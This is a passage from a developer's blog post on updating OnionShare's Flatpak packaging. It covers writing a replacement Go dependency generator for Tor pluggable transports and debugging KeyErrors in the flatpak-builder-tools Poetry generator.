Pruning<span class="w"> </span>cache
</pre></div>
<p>This built a simple Flatpak package that basically ran <code>go install</code> to download <code>meek-client</code> version 0.38.0, along with all of its dependencies, and then compiled them. Now that I've done this, I should be able to use the <code>flatpak-go-get-generator.py</code> script to generate the up-to-date <code>meek-client</code> module for me.</p>
<p>Finally, let's see the magic work:</p>
<pre><code>$ python3 flatpak-go-get-generator.py .flatpak-builder/build/meek-client/
Traceback (most recent call last):
File "/home/user/code/flatpak-builder-tools/go-get/flatpak-go-get-generator.py", line 92, in <module>
main()
File "/home/user/code/flatpak-builder-tools/go-get/flatpak-go-get-generator.py", line 82, in main
source_list = sources(args.build_dir)
^^^^^^^^^^^^^^^^^^^^^^^
File "/home/user/code/flatpak-builder-tools/go-get/flatpak-go-get-generator.py", line 68, in sources
return list(map(repo_source, repo_paths(build_dir)))
^^^^^^^^^^^^^^^^^^^^^
File "/home/user/code/flatpak-builder-tools/go-get/flatpak-go-get-generator.py", line 38, in repo_paths
for domain in domains:
File "/usr/lib/python3.11/pathlib.py", line 932, in iterdir
for name in os.listdir(self):
^^^^^^^^^^^^^^^^
FileNotFoundError: [Errno 2] No such file or directory: '.flatpak-builder/build/meek-client/src'
</code></pre>
<p>Hmm. While I can see that my <code>.flatpak-builder/build/meek-client</code> folder does indeed have all of the dependencies for <code>meek-client</code> downloaded, there's not a <code>src</code> folder in sight. What's going on?</p>
<p><em>🎵 Debugging noises get louder... 🎵</em></p>
<p>So it turns out that, due to changes in the Go ecosystem, the Go Get Generator is <em>broken beyond repair</em>. It's supposed to download and build your Go package from source, then look at all of the dependencies it had to download and compile a list of Flatpak modules based on the git repos and the specific commits it used. But modern versions of Go don't seem to git clone all of the dependencies anymore.</p>
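<p>Modern Go fetches dependencies through the module proxy into a module cache instead of git cloning them into a <code>src</code> directory, so any replacement tool has to discover the dependency list some other way. One option (a sketch of mine, not what either generator actually does) is to parse the output of <code>go mod download -json</code>, which prints one JSON object per module with its path and version:</p>

```python
import json

# Sample of the concatenated-JSON stream that `go mod download -json`
# emits (one object per module, no commas between them). The module
# paths and versions here are taken from the build log above.
raw = """
{"Path": "github.com/andybalholm/brotli", "Version": "v1.0.4"}
{"Path": "golang.org/x/text", "Version": "v0.3.7"}
"""

def parse_modules(stream: str) -> list:
    """Parse a stream of concatenated JSON objects into a list of dicts."""
    decoder = json.JSONDecoder()
    modules, idx = [], 0
    stream = stream.strip()
    while idx < len(stream):
        obj, end = decoder.raw_decode(stream, idx)
        modules.append(obj)
        while end < len(stream) and stream[end].isspace():
            end += 1  # skip whitespace between objects
        idx = end
    return modules

for mod in parse_modules(raw):
    print(f"{mod['Path']}@{mod['Version']}")
```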
<h2 id="debugging-flatpak-builder-tools">Debugging flatpak-builder-tools</h2><p>Since I need to figure out how to finish making this Flatpak package, and the Go Get Generator in <code>flatpak-builder-tools</code> is broken, I decided to program my own replacement. I <a href="https://github.com/micahflee/flatpak-builder-tools">forked</a> the flatpak-builder-tools repo, deleted the broken <code>go-get</code> folder, created a new <code>go</code> folder, and wrote my own new script, <code>flatpak-go-deps.py</code>. <a href="https://github.com/flatpak/flatpak-builder-tools/pull/369">Here's my pull request</a> to flatpak-builder-tools project.</p>
<p>It's not merged upstream at the time of writing (it's still a draft PR), but in the meantime you can see the new code I contributed, including the readme, at <a href="https://github.com/micahflee/flatpak-builder-tools/tree/fix-go/go">https://github.com/micahflee/flatpak-builder-tools/tree/fix-go/go</a>. The script I wrote, at the moment, is 282 lines of code.</p>
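<p>To give a sense of what the script has to do: each Go module becomes a Flatpak git source, with a <code>dest</code> under <code>src/</code> and a clone URL derived from the module path. Here's a rough illustration of that mapping (the function is my own hypothetical sketch, written to match the YAML output shown below, not code from the actual script):</p>

```python
def module_to_source(module_path: str, version: str) -> dict:
    """Turn a Go module path + version into a Flatpak git source entry.

    Hypothetical helper: the dest replaces every "." in the module path
    with "/", and the clone URL is the module path with ".git" appended.
    """
    return {
        "dest": "src/" + module_path.replace(".", "/"),
        "tag": version,
        "type": "git",
        "url": f"https://{module_path}.git",
    }

src = module_to_source("github.com/andybalholm/brotli", "v1.0.4")
print(src["dest"])  # src/github/com/andybalholm/brotli
print(src["url"])   # https://github.com/andybalholm/brotli.git
```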
<p>I'm going to start over with <code>meek-client</code>, but this time using my new script:</p>
<pre><code>$ ./flatpak-go-deps.py git.torproject.org/pluggable-transports/meek.git/meek-client@v0.38.0
go: creating new go.mod: module tempmod
Cloning into 'src/meek-client'...
warning: redirecting to https://gitlab.torproject.org/tpo/anti-censorship/pluggable-transports/meek.git/
remote: Enumerating objects: 2676, done.
remote: Counting objects: 100% (658/658), done.
remote: Compressing objects: 100% (281/281), done.
remote: Total 2676 (delta 372), reused 658 (delta 372), pack-reused 2018
Receiving objects: 100% (2676/2676), 549.97 KiB | 527.00 KiB/s, done.
Resolving deltas: 100% (1546/1546), done.
Note: switching to 'v0.38.0'.
You are in 'detached HEAD' state. You can look around, make experimental
changes and commit them, and you can discard any commits you make in this
state without impacting any branches by switching back to a branch.
If you want to create a new branch to retain commits you create, you may
do so (now or later) by using -c with the switch command. Example:
git switch -c <new-branch-name>
Or undo this operation with:
git switch -
Turn off this advice by setting config variable advice.detachedHead to false
HEAD is now at 3be00b7 programVersion = "0.38.0"
build-commands:
- . /usr/lib/sdk/golang/enable.sh; export GOPATH=$PWD; export GO111MODULE=off; go
install git.torproject.org/pluggable-transports/meek.git/meek.git
build-options:
env:
GOBIN: /app/bin/
buildsystem: simple
name: meek-client
sources:
- dest: src/git/torproject/org/pluggable-transports/goptlib/git
tag: v1.1.0
type: git
url: https://git.torproject.org/pluggable-transports/goptlib.git.git
- dest: src/github/com/andybalholm/brotli
tag: v1.0.4
type: git
url: https://github.com/andybalholm/brotli.git
- dest: src/github/com/klauspost/compress
tag: v1.15.9
type: git
url: https://github.com/klauspost/compress.git
- dest: src/github/com/refraction-networking/utls
tag: v1.1.5
type: git
url: https://github.com/refraction-networking/utls.git
- dest: src/golang/org/x/crypto
tag: v0.0.0-20220829220503-c86fa9a7ed90
type: git
url: https://golang.org/x/crypto.git
- dest: src/golang/org/x/net
tag: v0.0.0-20220909164309-bea034e7d591
type: git
url: https://golang.org/x/net.git
- dest: src/golang/org/x/sys
tag: v0.0.0-20220728004956-3c1f35247d10
type: git
url: https://golang.org/x/sys.git
- dest: src/golang/org/x/term
tag: v0.0.0-20210927222741-03fcf44c2211
type: git
url: https://golang.org/x/term.git
- dest: src/golang/org/x/text
tag: v0.3.7
type: git
url: https://golang.org/x/text.git
- dest: src/golang/org/x/tools
tag: v0.0.0-20180917221912-90fa682c2a6e
type: git
url: https://golang.org/x/tools.git
</code></pre>
<p>I then copy and paste the YAML into my OnionShare Flatpak manifest--though I'm reordering it slightly so <code>name</code> is at the top. This is what it looks like:</p>
<div class="hll"><pre><span></span><span class="p p-Indicator">-</span><span class="w"> </span><span class="nt">name</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">meek-client</span>
<span class="w"> </span><span class="nt">build-commands</span><span class="p">:</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">. /usr/lib/sdk/golang/enable.sh; export GOPATH=$PWD; export GO111MODULE=off; go</span>
<span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">install git.torproject.org/pluggable-transports/meek.git/meek.git</span>
<span class="w"> </span><span class="nt">build-options</span><span class="p">:</span>
<span class="w"> </span><span class="nt">env</span><span class="p">:</span>
<span class="w"> </span><span class="nt">GOBIN</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">/app/bin/</span>
<span class="w"> </span><span class="nt">buildsystem</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">simple</span>
<span class="w"> </span><span class="nt">sources</span><span class="p">:</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="nt">dest</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">src/git/torproject/org/pluggable-transports/goptlib/git</span>
<span class="w"> </span><span class="nt">tag</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">v1.1.0</span>
<span class="w"> </span><span class="nt">type</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">git</span>
<span class="w"> </span><span class="nt">url</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">https://git.torproject.org/pluggable-transports/goptlib.git.git</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="nt">dest</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">src/github/com/andybalholm/brotli</span>
<span class="w"> </span><span class="nt">tag</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">v1.0.4</span>
<span class="w"> </span><span class="nt">type</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">git</span>
<span class="w"> </span><span class="nt">url</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">https://github.com/andybalholm/brotli.git</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="nt">dest</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">src/github/com/klauspost/compress</span>
<span class="w"> </span><span class="nt">tag</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">v1.15.9</span>
<span class="w"> </span><span class="nt">type</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">git</span>
<span class="w"> </span><span class="nt">url</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">https://github.com/klauspost/compress.git</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="nt">dest</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">src/github/com/refraction-networking/utls</span>
<span class="w"> </span><span class="nt">tag</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">v1.1.5</span>
<span class="w"> </span><span class="nt">type</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">git</span>
<span class="w"> </span><span class="nt">url</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">https://github.com/refraction-networking/utls.git</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="nt">dest</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">src/golang/org/x/crypto</span>
<span class="w"> </span><span class="nt">tag</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">v0.0.0-20220829220503-c86fa9a7ed90</span>
<span class="w"> </span><span class="nt">type</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">git</span>
<span class="w"> </span><span class="nt">url</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">https://golang.org/x/crypto.git</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="nt">dest</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">src/golang/org/x/net</span>
<span class="w"> </span><span class="nt">tag</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">v0.0.0-20220909164309-bea034e7d591</span>
<span class="w"> </span><span class="nt">type</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">git</span>
<span class="w"> </span><span class="nt">url</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">https://golang.org/x/net.git</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="nt">dest</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">src/golang/org/x/sys</span>
<span class="w"> </span><span class="nt">tag</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">v0.0.0-20220728004956-3c1f35247d10</span>
<span class="w"> </span><span class="nt">type</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">git</span>
<span class="w"> </span><span class="nt">url</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">https://golang.org/x/sys.git</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="nt">dest</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">src/golang/org/x/term</span>
<span class="w"> </span><span class="nt">tag</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">v0.0.0-20210927222741-03fcf44c2211</span>
<span class="w"> </span><span class="nt">type</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">git</span>
<span class="w"> </span><span class="nt">url</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">https://golang.org/x/term.git</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="nt">dest</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">src/golang/org/x/text</span>
<span class="w"> </span><span class="nt">tag</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">v0.3.7</span>
<span class="w"> </span><span class="nt">type</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">git</span>
<span class="w"> </span><span class="nt">url</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">https://golang.org/x/text.git</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="nt">dest</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">src/golang/org/x/tools</span>
<span class="w"> </span><span class="nt">tag</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">v0.0.0-20180917221912-90fa682c2a6e</span>
<span class="w"> </span><span class="nt">type</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">git</span>
<span class="w"> </span><span class="nt">url</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">https://golang.org/x/tools.git</span>
</pre></div>
<p>Next, I'm doing the same with <code>snowflake-client</code>, and also <code>obfs4proxy</code> again for good measure:</p>
<div class="hll"><pre><span></span>./flatpak-go-deps.py<span class="w"> </span>git.torproject.org/pluggable-transports/snowflake.git/client@v2.6.0
./flatpak-go-deps.py<span class="w"> </span>gitlab.com/yawning/obfs4.git/obfs4proxy@obfs4proxy-0.0.14
</pre></div>
<p>The one change I needed to make was to append the command <code>mv /app/bin/client /app/bin/snowflake-client</code> to the end of <code>build-commands</code> in <code>snowflake-client</code>, since by default the binary it builds is just called <code>client</code>.</p>
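<p>For illustration, the end of the <code>snowflake-client</code> module looks roughly like this after that change (abbreviated: the <code>go install</code> line is approximate and the <code>sources</code> list is omitted):</p>

```yaml
- name: snowflake-client
  buildsystem: simple
  build-commands:
    - . /usr/lib/sdk/golang/enable.sh; export GOPATH=$PWD; export GO111MODULE=off;
      go install git.torproject.org/pluggable-transports/snowflake.git/client
    - mv /app/bin/client /app/bin/snowflake-client
```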
<p>This <em>looks</em> like it should work, but I still need to test it. <strong>(Spoiler: It doesn't.)</strong> Before I can test it by building the Flatpak package, though, I'm going to finish updating the rest of the Flatpak manifest files, specifically the Python dependencies.</p>
<h3 id="trying-to-update-python-dependencies">Trying to update Python dependencies</h3><p>Here's my documentation from <code>RELEASE.md</code> for how to go about updating all of the Python dependencies, for both <code>onionshare-cli</code> and <code>onionshare</code>, in the Flatpak manifest file:</p>
<blockquote><pre><code>pip3 install toml requirements-parser
# clone flatpak-build-tools
git clone https://github.com/flatpak/flatpak-builder-tools.git
# get onionshare-cli dependencies
cd poetry
./flatpak-poetry-generator.py ../../onionshare/cli/poetry.lock
cd ..
# get onionshare dependencies
cd pip
./flatpak-pip-generator $(python3 -c 'import toml; print("\n".join(toml.loads(open("../../onionshare/desktop/pyproject.toml").read())["tool"]["poetry"]["dependencies"]))' |grep -vi onionshare_cli |grep -vi python | grep -vi pyside6 | grep -vi cx_freeze |tr "\n" " ")
cd ..
# convert to yaml
./flatpak-json2yaml.py -o onionshare-cli.yml poetry/generated-poetry-sources.json
./flatpak-json2yaml.py -o onionshare.yml pip/python3-modules.json
</code></pre>
</blockquote>
<p>Hopefully this will just work with minimal fuss.</p>
<p>I'm going to start with the <code>onionshare-cli</code> dependencies:</p>
<pre><code>$ ./flatpak-poetry-generator.py ../../onionshare/cli/poetry.lock
Scanning "../../onionshare/cli/poetry.lock"
Traceback (most recent call last):
File "/home/user/code/flatpak-builder-tools/poetry/./flatpak-poetry-generator.py", line 166, in <module>
main()
File "/home/user/code/flatpak-builder-tools/poetry/./flatpak-poetry-generator.py", line 139, in main
dep_names = get_dep_names(parsed_lockfile, include_devel=include_devel)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/home/user/code/flatpak-builder-tools/poetry/./flatpak-poetry-generator.py", line 112, in get_dep_names
package["category"] == "dev"
~~~~~~~^^^^^^^^^^^^
KeyError: 'category'
</code></pre>
<p>Minimal fuss, it turns out, was too much to hope for. <em>🎵 Debugging noises... 🎵</em></p>
<h3 id="another-flatpak-builder-tools-rabbit-hole">Another flatpak-builder-tools rabbit hole</h3><p>I popped open <code>flatpak-poetry-generator.py</code> to see what the problem is. The exception happened in this function:</p>
<div class="hll"><pre><span></span><span class="k">def</span> <span class="nf">get_dep_names</span><span class="p">(</span><span class="n">parsed_lockfile</span><span class="p">:</span> <span class="nb">dict</span><span class="p">,</span> <span class="n">include_devel</span><span class="p">:</span> <span class="nb">bool</span> <span class="o">=</span> <span class="kc">True</span><span class="p">)</span> <span class="o">-></span> <span class="nb">list</span><span class="p">:</span>
<span class="w"> </span><span class="sd">"""Gets the list of dependency names.</span>
<span class="sd"> Args:</span>
<span class="sd"> parsed_lockfile (dict): The dictionary of the parsed lockfile.</span>
<span class="sd"> include_devel (bool): Include dev dependencies, defaults to True.</span>
<span class="sd"> Returns (list): The dependency names.</span>
<span class="sd"> """</span>
<span class="n">dep_names</span> <span class="o">=</span> <span class="p">[]</span>
<span class="k">for</span> <span class="n">section</span><span class="p">,</span> <span class="n">packages</span> <span class="ow">in</span> <span class="n">parsed_lockfile</span><span class="o">.</span><span class="n">items</span><span class="p">():</span>
<span class="k">if</span> <span class="n">section</span> <span class="o">==</span> <span class="s2">"package"</span><span class="p">:</span>
<span class="k">for</span> <span class="n">package</span> <span class="ow">in</span> <span class="n">packages</span><span class="p">:</span>
<span class="k">if</span> <span class="p">(</span>
<span class="n">package</span><span class="p">[</span><span class="s2">"category"</span><span class="p">]</span> <span class="o">==</span> <span class="s2">"dev"</span>
<span class="ow">and</span> <span class="n">include_devel</span>
<span class="ow">and</span> <span class="ow">not</span> <span class="n">package</span><span class="p">[</span><span class="s2">"optional"</span><span class="p">]</span>
<span class="ow">or</span> <span class="n">package</span><span class="p">[</span><span class="s2">"category"</span><span class="p">]</span> <span class="o">==</span> <span class="s2">"main"</span>
<span class="ow">and</span> <span class="ow">not</span> <span class="n">package</span><span class="p">[</span><span class="s2">"optional"</span><span class="p">]</span>
<span class="p">):</span>
<span class="n">dep_names</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="n">package</span><span class="p">[</span><span class="s2">"name"</span><span class="p">])</span>
<span class="k">return</span> <span class="n">dep_names</span>
</pre></div>
<p>For debugging purposes, I added the following line to the beginning of the for loop that's looping through packages (before the if statement):</p>
<div class="hll"><pre><span></span><span class="nb">print</span><span class="p">(</span><span class="n">json</span><span class="o">.</span><span class="n">dumps</span><span class="p">(</span><span class="n">package</span><span class="p">,</span> <span class="n">indent</span><span class="o">=</span><span class="mi">2</span><span class="p">))</span>
</pre></div>
<p>And I re-ran the script. This is the package that it choked on:</p>
<div class="hll"><pre><span></span><span class="p">{</span>
<span class="w"> </span><span class="nt">"name"</span><span class="p">:</span><span class="w"> </span><span class="s2">"bidict"</span><span class="p">,</span>
<span class="w"> </span><span class="nt">"version"</span><span class="p">:</span><span class="w"> </span><span class="s2">"0.22.1"</span><span class="p">,</span>
<span class="w"> </span><span class="nt">"description"</span><span class="p">:</span><span class="w"> </span><span class="s2">"The bidirectional mapping library for Python."</span><span class="p">,</span>
<span class="w"> </span><span class="nt">"optional"</span><span class="p">:</span><span class="w"> </span><span class="kc">false</span><span class="p">,</span>
<span class="w"> </span><span class="nt">"python-versions"</span><span class="p">:</span><span class="w"> </span><span class="s2">">=3.7"</span><span class="p">,</span>
<span class="w"> </span><span class="nt">"files"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span>
<span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="nt">"file"</span><span class="p">:</span><span class="w"> </span><span class="s2">"bidict-0.22.1-py3-none-any.whl"</span><span class="p">,</span>
<span class="w"> </span><span class="nt">"hash"</span><span class="p">:</span><span class="w"> </span><span class="s2">"sha256:6ef212238eb884b664f28da76f33f1d28b260f665fc737b413b287d5487d1e7b"</span>
<span class="w"> </span><span class="p">},</span>
<span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="nt">"file"</span><span class="p">:</span><span class="w"> </span><span class="s2">"bidict-0.22.1.tar.gz"</span><span class="p">,</span>
<span class="w"> </span><span class="nt">"hash"</span><span class="p">:</span><span class="w"> </span><span class="s2">"sha256:1e0f7f74e4860e6d0943a05d4134c63a2fad86f3d4732fb265bd79e4e856d81d"</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="p">],</span>
<span class="w"> </span><span class="nt">"extras"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="nt">"docs"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span>
<span class="w"> </span><span class="s2">"furo"</span><span class="p">,</span>
<span class="w"> </span><span class="s2">"sphinx"</span><span class="p">,</span>
<span class="w"> </span><span class="s2">"sphinx-copybutton"</span>
<span class="w"> </span><span class="p">],</span>
<span class="w"> </span><span class="nt">"lint"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span>
<span class="w"> </span><span class="s2">"pre-commit"</span>
<span class="w"> </span><span class="p">],</span>
<span class="w"> </span><span class="nt">"test"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span>
<span class="w"> </span><span class="s2">"hypothesis"</span><span class="p">,</span>
<span class="w"> </span><span class="s2">"pytest"</span><span class="p">,</span>
<span class="w"> </span><span class="s2">"pytest-benchmark[histogram]"</span><span class="p">,</span>
<span class="w"> </span><span class="s2">"pytest-cov"</span><span class="p">,</span>
<span class="w"> </span><span class="s2">"pytest-xdist"</span><span class="p">,</span>
<span class="w"> </span><span class="s2">"sortedcollections"</span><span class="p">,</span>
<span class="w"> </span><span class="s2">"sortedcontainers"</span><span class="p">,</span>
<span class="w"> </span><span class="s2">"sphinx"</span>
<span class="w"> </span><span class="p">]</span>
<span class="w"> </span><span class="p">}</span>
<span class="p">}</span>
</pre></div>
<p>This package doesn't have a <code>category</code> key. Looking at the if statement, it basically says: append the package to the list of dependencies if it's in the <code>dev</code> category, <code>include_devel</code> is true, and the package isn't optional; or if it's in the <code>main</code> category and it's not optional. Since <code>category</code> isn't set for this package, I'll modify the if statement like this:</p>
<div class="hll"><pre><span></span><span class="k">if</span> <span class="p">(</span>
<span class="p">(</span><span class="s2">"category"</span> <span class="ow">not</span> <span class="ow">in</span> <span class="n">package</span> <span class="ow">and</span> <span class="ow">not</span> <span class="n">package</span><span class="p">[</span><span class="s2">"optional"</span><span class="p">])</span>
<span class="ow">or</span> <span class="p">(</span>
<span class="n">package</span><span class="p">[</span><span class="s2">"category"</span><span class="p">]</span> <span class="o">==</span> <span class="s2">"dev"</span>
<span class="ow">and</span> <span class="n">include_devel</span>
<span class="ow">and</span> <span class="ow">not</span> <span class="n">package</span><span class="p">[</span><span class="s2">"optional"</span><span class="p">]</span>
<span class="p">)</span>
<span class="ow">or</span> <span class="p">(</span><span class="n">package</span><span class="p">[</span><span class="s2">"category"</span><span class="p">]</span> <span class="o">==</span> <span class="s2">"main"</span> <span class="ow">and</span> <span class="ow">not</span> <span class="n">package</span><span class="p">[</span><span class="s2">"optional"</span><span class="p">])</span>
<span class="p">):</span>
</pre></div>
<p>Now if <code>category</code> isn't set, it adds the package to the list anyway. I also added some extra parentheses to make the logic clearer. Let's see if this did the trick...</p>
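<p>As an aside, the whole condition could also be collapsed with <code>dict.get</code>, which treats a missing <code>category</code> as <code>main</code> and sidesteps this class of <code>KeyError</code> entirely. A hypothetical refactor (the helper name is mine, not from the script):</p>

```python
def should_include(package: dict, include_devel: bool = True) -> bool:
    # Newer Poetry lockfiles omit "category" entirely; treat missing as "main"
    category = package.get("category", "main")
    if package.get("optional", False):
        return False
    return category == "main" or (category == "dev" and include_devel)
```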
<pre><code>$ ./flatpak-poetry-generator.py ../../onionshare/cli/poetry.lock
Scanning "../../onionshare/cli/poetry.lock"
Traceback (most recent call last):
File "/home/user/code/flatpak-builder-tools/poetry/./flatpak-poetry-generator.py", line 168, in <module>
main()
File "/home/user/code/flatpak-builder-tools/poetry/./flatpak-poetry-generator.py", line 157, in main
sources = get_module_sources(parsed_lockfile, include_devel=include_devel)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/home/user/code/flatpak-builder-tools/poetry/./flatpak-poetry-generator.py", line 67, in get_module_sources
package["category"] == "dev"
~~~~~~~^^^^^^^^^^^^
KeyError: 'category'
</code></pre>
<p>It's a similar error, but on a different line of code, in this function:</p>
<div class="hll"><pre><span></span><span class="k">def</span> <span class="nf">get_module_sources</span><span class="p">(</span><span class="n">parsed_lockfile</span><span class="p">:</span> <span class="nb">dict</span><span class="p">,</span> <span class="n">include_devel</span><span class="p">:</span> <span class="nb">bool</span> <span class="o">=</span> <span class="kc">True</span><span class="p">)</span> <span class="o">-></span> <span class="nb">list</span><span class="p">:</span>
<span class="w"> </span><span class="sd">"""Gets the list of sources from a toml parsed lockfile.</span>
<span class="sd"> Args:</span>
<span class="sd"> parsed_lockfile (dict): The dictionary of the parsed lockfile.</span>
<span class="sd"> include_devel (bool): Include dev dependencies, defaults to True.</span>
<span class="sd"> Returns (list): The sources.</span>
<span class="sd"> """</span>
<span class="n">sources</span> <span class="o">=</span> <span class="p">[]</span>
<span class="n">hash_re</span> <span class="o">=</span> <span class="n">re</span><span class="o">.</span><span class="n">compile</span><span class="p">(</span><span class="sa">r</span><span class="s2">"(sha1|sha224|sha384|sha256|sha512|md5):([a-f0-9]+)"</span><span class="p">)</span>
<span class="k">for</span> <span class="n">section</span><span class="p">,</span> <span class="n">packages</span> <span class="ow">in</span> <span class="n">parsed_lockfile</span><span class="o">.</span><span class="n">items</span><span class="p">():</span>
<span class="k">if</span> <span class="n">section</span> <span class="o">==</span> <span class="s2">"package"</span><span class="p">:</span>
<span class="k">for</span> <span class="n">package</span> <span class="ow">in</span> <span class="n">packages</span><span class="p">:</span>
<span class="k">if</span> <span class="p">(</span>
<span class="n">package</span><span class="p">[</span><span class="s2">"category"</span><span class="p">]</span> <span class="o">==</span> <span class="s2">"dev"</span>
<span class="ow">and</span> <span class="n">include_devel</span>
<span class="ow">and</span> <span class="ow">not</span> <span class="n">package</span><span class="p">[</span><span class="s2">"optional"</span><span class="p">]</span>
<span class="ow">or</span> <span class="n">package</span><span class="p">[</span><span class="s2">"category"</span><span class="p">]</span> <span class="o">==</span> <span class="s2">"main"</span>
<span class="ow">and</span> <span class="ow">not</span> <span class="n">package</span><span class="p">[</span><span class="s2">"optional"</span><span class="p">]</span>
<span class="p">):</span>
<span class="c1"># Check for old metadata format (poetry version < 1.0.0b2)</span>
<span class="k">if</span> <span class="s2">"hashes"</span> <span class="ow">in</span> <span class="n">parsed_lockfile</span><span class="p">[</span><span class="s2">"metadata"</span><span class="p">]:</span>
<span class="n">hashes</span> <span class="o">=</span> <span class="n">parsed_lockfile</span><span class="p">[</span><span class="s2">"metadata"</span><span class="p">][</span><span class="s2">"hashes"</span><span class="p">][</span><span class="n">package</span><span class="p">[</span><span class="s2">"name"</span><span class="p">]]</span>
<span class="c1"># Else new metadata format</span>
<span class="k">else</span><span class="p">:</span>
<span class="n">hashes</span> <span class="o">=</span> <span class="p">[]</span>
<span class="k">for</span> <span class="n">package_name</span> <span class="ow">in</span> <span class="n">parsed_lockfile</span><span class="p">[</span><span class="s2">"metadata"</span><span class="p">][</span><span class="s2">"files"</span><span class="p">]:</span>
<span class="k">if</span> <span class="n">package_name</span> <span class="o">==</span> <span class="n">package</span><span class="p">[</span><span class="s2">"name"</span><span class="p">]:</span>
<span class="o">--</span><span class="n">snip</span><span class="o">--</span>
</pre></div>
<p>I made the same change there and ran it again:</p>
<pre><code>$ ./flatpak-poetry-generator.py ../../onionshare/cli/poetry.lock
Scanning "../../onionshare/cli/poetry.lock"
Traceback (most recent call last):
File "/home/user/code/flatpak-builder-tools/poetry/./flatpak-poetry-generator.py", line 170, in <module>
main()
File "/home/user/code/flatpak-builder-tools/poetry/./flatpak-poetry-generator.py", line 159, in main
sources = get_module_sources(parsed_lockfile, include_devel=include_devel)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/home/user/code/flatpak-builder-tools/poetry/./flatpak-poetry-generator.py", line 81, in get_module_sources
for package_name in parsed_lockfile["metadata"]["files"]:
~~~~~~~~~~~~~~~~~~~~~~~~~~~^^^^^^^^^
KeyError: 'files'
</code></pre>
